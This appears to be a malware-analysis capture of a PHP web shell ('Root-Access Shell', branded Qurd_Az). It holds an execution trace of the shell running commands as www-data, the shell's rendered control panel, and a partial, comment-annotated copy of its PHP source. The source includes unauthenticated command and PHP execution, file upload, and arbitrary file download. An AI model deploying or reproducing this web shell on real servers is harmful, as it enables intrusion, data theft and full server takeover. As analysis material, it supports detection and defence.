--progress=TYPE select progress gauge type', 38 => ' --show-progress display the progress bar in any verbosity mode', 39 => ' -N, --timestamping don\'t re-retrieve files unless newer than', 40 => ' local', 41 => ' --no-if-modified-since don\'t use conditional if-modified-since get', 42 => ' requests in timestamping mode', 43 => ' --no-use-server-timestamps don\'t set the local file\'s timestamp by', 44 => ' the one on the server', 45 => ' -S, --server-response print server response', 46 => ' --spider don\'t download anything', 47 => ' -T, --timeout=SECONDS set all timeout values to SECONDS', 48 => ' --dns-timeout=SECS set the DNS lookup timeout to SECS', 49 => ' --connect-timeout=SECS set the connect timeout to SECS', 50 => ' --read-timeout=SECS set the read timeout to SECS', 51 => ' -w, --wait=SECONDS wait SECONDS between retrievals', 52 => ' (applies if more then 1 URL is to be retrieved)', 53 => ' --waitretry=SECONDS wait 1..SECONDS between retries of a retrieval', 54 => ' (applies if more then 1 URL is to be retrieved)', 55 => ' --random-wait wait from 0.5*WAIT...1.5*WAIT secs between retrievals', 56 => ' (applies if more then 1 URL is to be retrieved)', 57 => ' --no-proxy explicitly turn off proxy', 58 => ' -Q, --quota=NUMBER set retrieval quota to NUMBER', 59 => ' --bind-address=ADDRESS bind to ADDRESS (hostname or IP) on local host', 60 => ' --limit-rate=RATE limit download rate to RATE', 61 => ' --no-dns-cache disable caching DNS lookups', 62 => ' --restrict-file-names=OS restrict chars in file names to ones OS allows', 63 => ' --ignore-case ignore case when matching files/directories', 64 => ' -4, --inet4-only connect only to IPv4 addresses', 65 => ' -6, --inet6-only connect only to IPv6 addresses', 66 => ' --prefer-family=FAMILY connect first to addresses of specified family,', 67 => ' one of IPv6, IPv4, or none', 68 => ' --user=USER set both ftp and http user to USER', 69 => ' --password=PASS set both ftp and http password to PASS', 70 => ' 
--ask-password prompt for passwords', 71 => ' --use-askpass=COMMAND specify credential handler for requesting', 72 => ' username and password. If no COMMAND is', 73 => ' specified the WGET_ASKPASS or the SSH_ASKPASS', 74 => ' environment variable is used.', 75 => ' --no-iri turn off IRI support', 76 => ' --local-encoding=ENC use ENC as the local encoding for IRIs', 77 => ' --remote-encoding=ENC use ENC as the default remote encoding', 78 => ' --unlink remove file before clobber', 79 => ' --xattr turn on storage of metadata in extended file attributes', 80 => '', 81 => 'Directories:', 82 => ' -nd, --no-directories don\'t create directories', 83 => ' -x, --force-directories force creation of directories', 84 => ' -nH, --no-host-directories don\'t create host directories', 85 => ' --protocol-directories use protocol name in directories', 86 => ' -P, --directory-prefix=PREFIX save files to PREFIX/..', 87 => ' --cut-dirs=NUMBER ignore NUMBER remote directory components', 88 => '', 89 => 'HTTP options:', 90 => ' --http-user=USER set http user to USER', 91 => ' --http-password=PASS set http password to PASS', 92 => ' --no-cache disallow server-cached data', 93 => ' --default-page=NAME change the default page name (normally', 94 => ' this is \'index.html\'.)', 95 => ' -E, --adjust-extension save HTML/CSS documents with proper extensions', 96 => ' --ignore-length ignore \'Content-Length\' header field', 97 => ' --header=STRING insert STRING among the headers', 98 => ' --compression=TYPE choose compression, one of auto, gzip and none. 
(default: none)', 99 => ' --max-redirect maximum redirections allowed per page', 100 => ' --proxy-user=USER set USER as proxy username', 101 => ' --proxy-password=PASS set PASS as proxy password', 102 => ' --referer=URL include \'Referer: URL\' header in HTTP request', 103 => ' --save-headers save the HTTP headers to file', 104 => ' -U, --user-agent=AGENT identify as AGENT instead of Wget/VERSION', 105 => ' --no-http-keep-alive disable HTTP keep-alive (persistent connections)', 106 => ' --no-cookies don\'t use cookies', 107 => ' --load-cookies=FILE load cookies from FILE before session', 108 => ' --save-cookies=FILE save cookies to FILE after session', 109 => ' --keep-session-cookies load and save session (non-permanent) cookies', 110 => ' --post-data=STRING use the POST method; send STRING as the data', 111 => ' --post-file=FILE use the POST method; send contents of FILE', 112 => ' --method=HTTPMethod use method "HTTPMethod" in the request', 113 => ' --body-data=STRING send STRING as data. --method MUST be set', 114 => ' --body-file=FILE send contents of FILE. --method MUST be set', 115 => ' --content-disposition honor the Content-Disposition header when', 116 => ' choosing local file names (EXPERIMENTAL)', 117 => ' --content-on-error output the received content on server errors', 118 => ' --auth-no-challenge send Basic HTTP authentication information', 119 => ' without first waiting for the server\'s', 120 => ' challenge', 121 => '', 122 => 'HTTPS (SSL/TLS) options:', 123 => ' --secure-protocol=PR choose secure protocol, one of auto, SSLv2,', 124 => ' SSLv3, TLSv1, TLSv1_1, TLSv1_2 and PFS', 125 => ' --https-only only follow secure HTTPS links', 126 => ' --no-check-certificate don\'t validate the server\'s certificate', 127 => ' --certificate=FILE client certificate file', ...]
4 46 1 0.008518 530120
4 46 R 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
3 A /var/www/html/uploads/root.php 69 $out = 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
3 43 1 0.008608 497672
3 43 R 'GNU Wget 1.21.2, a non-interactive network retriever.\nUsage: wget [OPTION]... [URL]...\n\nMandatory arguments to long options are mandatory for short options too.\n\nStartup:\n -V, --version display the version of Wget and exit\n -h, --help print this help\n -b, --background go to background after startup\n -e, --execute=COMMAND execute a `.wgetrc\'-style command\n\nLogging and input file:\n -o, --output-file=FILE log messag'
2 42 1 0.008650 481288
2 42 R '<font size=2 color=#29a329>ON</font>'
2 47 0 0.008670 481288 getcwd 0 /var/www/html/uploads/root.php 163 0
2 47 1 0.008686 481336
2 47 R '/var/www/html/uploads'
2 48 0 0.008701 481336 diskfreespace 0 /var/www/html/uploads/root.php 163 1 '/var/www/html/uploads'
2 48 1 0.008719 481368
2 48 R 193376878592
2 49 0 0.008734 481288 view_size 1 /var/www/html/uploads/root.php 163 1 193376878592
3 50 0 0.008749 481288 round 0 /var/www/html/uploads/root.php 46 1 18009.625244141
3 50 1 0.008762 481320
3 50 R 18010
2 A /var/www/html/uploads/root.php 46 $size = '180.1 GB'
2 49 1 0.008789 481328
2 49 R '180.1 GB'
2 51 0 0.008803 481288 getuser 1 /var/www/html/uploads/root.php 164 0
3 52 0 0.008815 481288 get_current_user 0 /var/www/html/uploads/root.php 96 0
3 52 1 0.008853 481328
3 52 R 'osboxes'
2 A /var/www/html/uploads/root.php 96 $out = 'osboxes'
3 53 0 0.008879 481328 ex 1 /var/www/html/uploads/root.php 97 1 'id'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 54 0 0.008905 481328 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 54 1 0.008919 481368
4 54 R TRUE
4 55 0 0.008932 481352 exec 0 /var/www/html/uploads/root.php 69 2 'id' ''
4 55 1 0.010595 481952
4 55 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4 56 0 0.010652 481808 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
4 56 1 0.010673 481872
4 56 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 A /var/www/html/uploads/root.php 69 $out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 53 1 0.010706 481408
3 53 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/root.php 97 $out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 51 1 0.010735 481376
2 51 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 57 0 0.010755 481296 testmssql 1 /var/www/html/uploads/root.php 165 0
3 58 0 0.010768 481296 function_exists 0 /var/www/html/uploads/root.php 60 1 'mssql_connect'
3 58 1 0.010783 481336
3 58 R FALSE
2 57 1 0.010797 481296
2 57 R '<font size=2 color=#ff4500>OFF</font>'
2 59 0 0.010814 481296 testperl 1 /var/www/html/uploads/root.php 165 0
3 60 0 0.010826 481296 ex 1 /var/www/html/uploads/root.php 43 1 'perl -h'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 61 0 0.010848 481296 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 61 1 0.010862 481336
4 61 R TRUE
4 62 0 0.010875 481320 exec 0 /var/www/html/uploads/root.php 69 2 'perl -h' ''
4 62 1 0.013048 487040
4 62 R ''
4 63 0 0.013091 486976 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => '', 1 => 'Usage: perl [switches] [--] [programfile] [arguments]', 2 => ' -0[octal/hexadecimal] specify record separator (\\0, if no argument)', 3 => ' -a autosplit mode with -n or -p (splits $_ into @F)', 4 => ' -C[number/list] enables the listed Unicode features', 5 => ' -c check syntax only (runs BEGIN and CHECK blocks)', 6 => ' -d[t][:MOD] run program under debugger or module Devel::MOD', 7 => ' -D[number/letters] set debugging flags (argument is a bit mask or alphabets)', 8 => ' -e commandline one line of program (several -e\'s allowed, omit programfile)', 9 => ' -E commandline like -e, but enables all optional features', 10 => ' -f don\'t do $sitelib/sitecustomize.pl at startup', 11 => ' -F/pattern/ split() pattern for -a switch (//\'s are optional)', 12 => ' -i[extension] edit <> files in place (makes backup if extension supplied)', 13 => ' -Idirectory specify @INC/#include directory (several -I\'s allowed)', 14 => ' -l[octnum] enable line ending processing, specifies line terminator', 15 => ' -[mM][-]module execute "use/no module..." before executing program', 16 => ' -n assume "while (<>) { ... }" loop around program', 17 => ' -p assume loop like -n but print line also, like sed', 18 => ' -s enable rudimentary parsing for switches after programfile', 19 => ' -S look for programfile using PATH environment variable', 20 => ' -t enable tainting warnings', 21 => ' -T enable tainting checks', 22 => ' -u dump core after parsing program', 23 => ' -U allow unsafe operations', 24 => ' -v print version, patchlevel and license', 25 => ' -V[:configvar] print configuration summary (or a single Config.pm variable)', 26 => ' -w enable many useful warnings', 27 => ' -W enable all warnings', 28 => ' -x[directory] ignore text before #!perl line (optionally cd to directory)', 29 => ' -X disable all warnings', 30 => '', 31 => 'Run \'perldoc perl\' for more help with Perl.', 32 => '']
4 63 1 0.013203 489088
4 63 R '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
3 A /var/www/html/uploads/root.php 69 $out = '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
3 60 1 0.013291 483344
3 60 R '\nUsage: perl [switches] [--] [programfile] [arguments]\n -0[octal/hexadecimal] specify record separator (\\0, if no argument)\n -a autosplit mode with -n or -p (splits $_ into @F)\n -C[number/list] enables the listed Unicode features\n -c check syntax only (runs BEGIN and CHECK blocks)\n -d[t][:MOD] run program under debugger or module Devel::MOD\n -D[number/letters] set debugging flags (argument is a bit mask or alphabets)\n -e commandline '
2 59 1 0.013335 481296
2 59 R '<font size=2 color=#29a329>ON</font>'
2 64 0 0.013362 481296 date 0 /var/www/html/uploads/root.php 166 1 'H:i d-m-Y'
2 64 1 0.013443 483648
2 64 R '23:27 12-02-2023'
2 65 0 0.013470 483360 shell 1 /var/www/html/uploads/root.php 168 0
3 66 0 0.013506 483360 ex 1 /var/www/html/uploads/root.php 87 1 'ls -la'
3 A /var/www/html/uploads/root.php 68 $out = ''
4 67 0 0.013540 483360 function_exists 0 /var/www/html/uploads/root.php 69 1 'exec'
4 67 1 0.013559 483400
4 67 R TRUE
4 68 0 0.013578 483384 exec 0 /var/www/html/uploads/root.php 69 2 'ls -la' ''
4 68 1 0.015302 484488
4 68 R '-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
4 69 0 0.015333 484328 join 0 /var/www/html/uploads/root.php 69 2 '\n' [0 => 'total 32', 1 => 'drwxrwxrwx 3 root root 4096 Feb 12 23:27 .', 2 => 'drwxrwxrwx 3 root root 4096 Feb 12 23:27 ..', 3 => '-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess', 4 => 'drwxrwxrwx 2 root root 4096 Feb 12 23:27 data', 5 => '-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php', 6 => '-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php']
4 69 1 0.015362 484776
4 69 R 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
3 A /var/www/html/uploads/root.php 69 $out = 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
3 66 1 0.015408 483744
3 66 R 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 A /var/www/html/uploads/root.php 87 $u = 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 65 1 0.015450 483744
2 65 R 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 70 0 0.015473 483744 htmlspecialchars 0 /var/www/html/uploads/root.php 168 1 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 70 1 0.015499 484544
2 70 R 'total 32\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 .\ndrwxrwxrwx 3 root root 4096 Feb 12 23:27 ..\n-rw-r--r-- 1 root root 64 Feb 12 23:27 .htaccess\ndrwxrwxrwx 2 root root 4096 Feb 12 23:27 data\n-rwxr-xr-x 1 root root 57 Feb 12 23:27 prepend.php\n-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php'
2 71 0 0.015523 483360 edit 1 /var/www/html/uploads/root.php 168 0
2 71 1 0.015537 483360
2 71 R NULL
2 72 0 0.015552 483360 pwd 1 /var/www/html/uploads/root.php 170 0
3 73 0 0.015565 483360 chdir 0 /var/www/html/uploads/root.php 101 1 NULL
3 73 1 0.015586 483400
3 73 R FALSE
3 74 0 0.015600 483360 getcwd 0 /var/www/html/uploads/root.php 102 0
3 74 1 0.015612 483408
3 74 R '/var/www/html/uploads'
2 A /var/www/html/uploads/root.php 102 $cwd = '/var/www/html/uploads'
3 75 0 0.015637 483408 strrpos 0 /var/www/html/uploads/root.php 103 2 '/var/www/html/uploads' '/'
3 75 1 0.015651 483480
3 75 R 13
2 A /var/www/html/uploads/root.php 103 $u = 13
2 72 1 0.015674 483408
2 72 R '/var/www/html/uploads/'
2 76 0 0.015698 483472 pwd 1 /var/www/html/uploads/root.php 174 0
3 77 0 0.015710 483472 chdir 0 /var/www/html/uploads/root.php 101 1 NULL
3 77 1 0.015727 483512
3 77 R FALSE
3 78 0 0.015740 483472 getcwd 0 /var/www/html/uploads/root.php 102 0
3 78 1 0.015752 483520
3 78 R '/var/www/html/uploads'
2 A /var/www/html/uploads/root.php 102 $cwd = '/var/www/html/uploads'
3 79 0 0.015775 483520 strrpos 0 /var/www/html/uploads/root.php 103 2 '/var/www/html/uploads' '/'
3 79 1 0.015788 483592
3 79 R 13
2 A /var/www/html/uploads/root.php 103 $u = 13
2 76 1 0.015810 483520
2 76 R '/var/www/html/uploads/'
2 80 0 0.015825 483472 pwd 1 /var/www/html/uploads/root.php 175 0
3 81 0 0.015837 483472 chdir 0 /var/www/html/uploads/root.php 101 1 NULL
3 81 1 0.015853 483512
3 81 R FALSE
3 82 0 0.015866 483472 getcwd 0 /var/www/html/uploads/root.php 102 0
3 82 1 0.015878 483520
3 82 R '/var/www/html/uploads'
2 A /var/www/html/uploads/root.php 102 $cwd = '/var/www/html/uploads'
3 83 0 0.015901 483520 strrpos 0 /var/www/html/uploads/root.php 103 2 '/var/www/html/uploads' '/'
3 83 1 0.015913 483592
3 83 R 13
2 A /var/www/html/uploads/root.php 103 $u = 13
2 80 1 0.015935 483520
2 80 R '/var/www/html/uploads/'
1 3 1 0.015950 483472
0.015996 379208
TRACE END [2023-02-13 02:27:49.093597]
<html><head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Qurd_Az_SH3LL</title>
</head>
<body bgcolor="#242629">
<p align="center"><b><font size="6" color="#008000">
<a href="mailto:--------------------------------%3C%20Qurd_Az_SH3ll%20%3C%3C%3C----%3E%3E%3E%20Email:Qurd_Az@Box.AZ%3E%20%3E--------------------------------">
<span style="text-decoration: none">Email : Qurd_Az@Box.Az</span></a></font></b></p>
<p align="center"><b><font size="6" color="#008000">..:: 0wn3R By Qurd_Az ::..</font></b></p>
<title>Root-Access Shell</title><meta http-equiv="Content-Type" content="text/html; charset=CP866">
<style type="text/css">
BODY { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 8px;margin: 0px;padding: 0px;text-align: center;color: #e7e7eb;background-color: #242629;}
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 10px;color: #e7e7eb;}
.contentb {background-color: #44474f;}
.t {padding: 6px;background-color: #242629;}
input,textarea,select
{background: #44474f;
border: 1px solid #242629;
color: #e7e7eb;
font-family: verdana, helvetica, sans-serif;
font-size: 11px;
margin: 5px;
padding: 2px;
vertical-align: middle;}
</style>
<script>
function kill(){
var y;
y = confirm('Do you indeed want to delete web-shell?');
if(y == true){document.location = '?kill=done';}}</script><br><center><table width="95%" border="0" cellspacing="1" cellpadding="1" bgcolor="#646c71" style="border-color:" #000000;="">
<tbody><tr><th class="t" align="left"><font size="2"><b>Server Info</b></font></th></tr><tr><td class="contentb"><table border="0" width="100%"><tbody><tr><td width="35%">System: <font size="1" color="#ff4500">Linux 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023</font></td>
<td width="15%">PHP-version: <font size="1" color="#29a329">7.2.34-37+ubuntu22.04.1+deb.sury.org+1</font></td>
<td width="15%">Oracle: <font size="2" color="#ff4500">OFF</font></td><td width="25%">Safe_mode: <font size="2" color="#ff4500">OFF</font></td></tr><tr>
<td width="35%">Server: <font size="1" color="#ff4500">Apache/2.4.52 (Ubuntu)</font></td>
<td width="15%">MySQL: <font size="2" color="#ff4500">OFF</font></td><td width="15%">cURL: <font size="2" color="#29a329">ON</font></td><td width="25%">Total space: 216.08 GB</td></tr><tr>
<td width="35%">PWD: <font size="1" color="#ff4500">/var/www/html/</font></td>
<td width="15%">PostgreSQL: <font size="2" color="#ff4500">OFF</font></td><td width="15%">WGet: <font size="2" color="#29a329">ON</font></td><td width="25%">Free space: 180.09 GB</td></tr><tr>
<td width="35%">User: <font size="1" color="#ff4500">uid=33(www-data) gid=33(www-data) groups=33(www-data)</font></td>
<td width="15%">MSSQL: <font size="2" color="#ff4500">OFF</font></td><td width="15%">Perl: <font size="2" color="#29a329">ON</font></td>
<td width="25%">Server time: 23:27 12-02-2023</td></tr></tbody></table></td></tr></tbody></table><table width="95%" border="0" cellspacing="1" cellpadding="1" bgcolor="#646c71" style="border-color:" #000000;="">
<tbody><tr><th class="t" align="left"><font size="2"><b>Shell</b> <a onclick="kill()"><b><font color="#FF0000">[Kill Shell]</font></b></a></font></th></tr>
<tr><td class="contentb"><center><form action="" method="POST"><input type="hidden" name="type" value="5"><textarea cols="150" rows="20" name="value">total 20
drwxrwxrwx 2 root root 4096 Feb 12 23:27 .
drwxrwxrwx 3 root root 4096 Feb 12 23:27 ..
-rw-r--r-- 1 root root 0 Feb 12 23:27 beneri.se_malware_analysis
-rw-rw-r-- 1 osboxes osboxes 11792 Feb 12 23:27 root.php</textarea></form><table border="0" width="100%"><tbody><tr><td width="50%" align="center"><form action="" method="POST">
<b>Enter comand:</b><input type="hidden" name="type" value="2"><input type="text" name="value" size="45"><input type="submit" value="Enter">
</form></td><td width="50%" align="center"><form action="" method="POST"><b>PWD:</b> <input type="text" name="value" size="51" value="/var/www/html/"><input type="hidden" name="type" value="3"><input type="submit" value="Enter">
</form></td></tr></tbody></table></center></td></tr></tbody></table><table width="95%" border="0" cellspacing="1" cellpadding="1" bgcolor="#646c71" style="border-color:" #000000;="">
<tbody><tr><th class="t" align="left"><font size="2"><b>Tools</b></font></th></tr>
<tr><td class="contentb"><table border="0" width="100%"><tbody><tr><td width="50%"><form action="" method="POST"><b>Edit file:</b><input type="hidden" name="type" value="4">
<input type="text" name="value" size="52" value="/var/www/html/"><input type="submit" value="Edit"></form></td>
<td width="50%"><form action="" method="POST"><b>Download:</b><input type="hidden" name="type" value="11"><input type="text" name="value" size="51" value="/var/www/html/"><input type="submit" value="Download">
</form></td></tr><tr><td width="50%"><form action="" method="POST"><b>Run PHP Code:</b>
<input type="hidden" name="type" value="1"><textarea rows="5" cols="46" name="value">echo "Root-Access Shell";</textarea><input type="submit" value="Run code"></form></td>
<td width="50%"><form enctype="multipart/form-data" action="" method="POST"><b>Upload:</b><input type="hidden" name="type" value="6">
<input type="file" name="userfile" size="40"><br><input type="hidden" name="type" value="6"><b>New name:</b><input type="text" size="37" name="newname"><input type="submit" value="Upload">
</form></td> </tr></tbody></table></td></tr></tbody></table><table width="95%" border="0" cellspacing="1" cellpadding="1" bgcolor="#646c71" style="border-color:" #000000;="">
<tbody><tr><th class="t" align="left"><font size="2"><b>Copyright</b></font></th></tr>
<tr><td class="contentb"><center><a href="http://forum.root-access.ru"><font size="2" color="#e7e7eb">Root-Access Shell v1.1</font></a></center>
</td></tr></tbody></table><br></center>
<p align="center"><b><font size="4" color="#800000"></font></b></p></body></html>
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Qurd_Az_SH3LL</title>
</head>
<body>
<p align="center"><b><font size="6" color="#008000">
<a href="mailto:--------------------------------%3C%20Qurd_Az_SH3ll%20%3C%3C%3C----%3E%3E%3E%20Email:Qurd_Az@Box.AZ%3E%20%3E--------------------------------">
<span style="text-decoration: none">Email : Qurd_Az@Box.Az</span></a></font></b></p>
<p align="center"><b><font size="6" color="#008000">..:: 0wn3R By Qurd_Az ::..</font></b></p>
</body>
</html>
<?php
// Bootstrap of the web shell: session setup, error suppression, an optional
// HTTP Basic auth gate, and the dispatch for the file-download request type.
// $auth is 0, so the Basic-auth block below is never entered and every request
// handler in this file is reachable without credentials.
$auth = 0; //Auth on/off == 1/0
// Session garbage-collection lifetime is set to 1 second before the session starts.
ini_set("session.gc_maxlifetime",1);
session_start();
// Turns off PHP error reporting, so failures are not shown in the response.
error_reporting(0);
// Called for its side effect: safe_mode() stores its result in $_SESSION['safe_mode'].
safe_mode();
// MD5 hex digests of the expected user name and password; the plaintext values
// are given in the author's own trailing comments. Both constants are fixed
// strings, so they can serve as static signatures when scanning a web root.
$name="63a9f0ea7bb98050796b649e85481845";//login = "root"
$pass="9df3b01c60df20d13843841ff0d4482c";//pass = "access"
// NOTE(review): the check reads $HTTP_SERVER_VARS, a legacy array that current
// PHP versions presumably no longer populate; with $auth = 1 the isset() test
// would then fail and every request would get the 401 below. Confirm on the host.
if($auth == 1){if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass)
{header("WWW-Authenticate: Basic realm=\"PanelAccess\"");
header("HTTP/1.0 401 Unauthorized");exit("Access Denied");}}
// Request type 11: the client-supplied path in $_POST['value'] goes to download()
// after stripslashes() only; no allow-list or base-directory check is applied.
if($_POST['type']==11){download(stripslashes($_POST['value']));};
// Sends the file at $dfilename to the client as an attachment.
// The path originates from $_POST['value'] (request type 11) and is opened
// as given, so any file readable by the web server account can be returned.
// Returns nothing; the file bytes are written to the response body.
function download($dfilename)
{$file=fopen($dfilename,"r");
// Discards the current output buffer; presumably meant to drop the HTML banner
// that the file emits before its PHP section (only effective with buffering on).
ob_clean();
$filename = basename($dfilename);
// The whole file is read into memory; errors from filesize() are silenced with @.
$filedump = fread($file,@filesize($dfilename));
fclose($file);
// $mime_type is never assigned in this function, so the Content-type value is empty.
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
// There is no exit after the echo, so the caller keeps executing afterwards.
echo $filedump;}
// Reports whether a perl binary can be run: returns the green "ON" label when
// ex('perl -h') yields non-empty output, otherwise the red "OFF" label.
// Each page load therefore spawns a 'perl -h' child process from the web server.
function testperl()
{if(ex('perl -h'))
{return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
// view_size: formats a byte count as a string with a GB/MB/KB/B suffix.
// Values of 1024 bytes and above are divided by the unit and kept to two
// decimals (round(x * 100) / 100); smaller values are returned as "<n> B".
}function view_size($size){
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;}
// Capability probes used by the "Server Info" table. Each returns the green
// "ON" label or the red "OFF" label as an HTML string.
// testfetch / testwget run an external command through ex(); the remaining
// probes only ask PHP whether a given extension function exists.
// testfetch: "ON" when ex('fetch --help') produces output.
function testfetch()
{if(ex('fetch --help'))
{return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
// testwget: "ON" when ex('wget --help') produces output.
}function testwget(){
if(ex('wget --help')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
// oracle: "ON" when the ocilogon function is available.
}function oracle(){
if(function_exists('ocilogon')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
// postgresql: "ON" when pg_connect is available.
}function postgresql(){
if(function_exists('pg_connect')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
// testmssql: "ON" when mssql_connect is available.
}function testmssql(){if(function_exists('mssql_connect')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
// testcurl: "ON" when curl_version is available.
}function testcurl(){
if(function_exists('curl_version')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
// testmysql: "ON" when mysql_connect is available.
}function testmysql(){
if(function_exists('mysql_connect')){return "<font size=2 color=#29a329>ON</font>";}else{return "<font size=2 color=#ff4500>OFF</font>";}
// safe_mode: despite the name, this does not read PHP's safe_mode setting.
// $safe_mode is not defined in this scope, so the first operand is always true
// and the result depends only on the probe: ex() runs a fixed echo command and
// the code checks that "h0ld" sits at offset 3 of the output. If it does not
// (command execution failed), $_SESSION['safe_mode'] is set to 1 and "ON" is
// returned; otherwise the flag is 0 and "OFF" is returned.
// The probe command line is a fixed literal, which makes it a stable string to
// look for in process-execution or audit logs on a suspected host.
}function safe_mode(){
if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3){$_SESSION['safe_mode'] = 1;return "<font size=2 color=#29a329>ON</font>";}else{ $_SESSION['safe_mode'] = 0;return "<font size=2 color=#ff4500>OFF</font>";}
// ex: runs the command line $in and returns its output as a string.
// It uses the first available primitive in this order: exec, passthru, system,
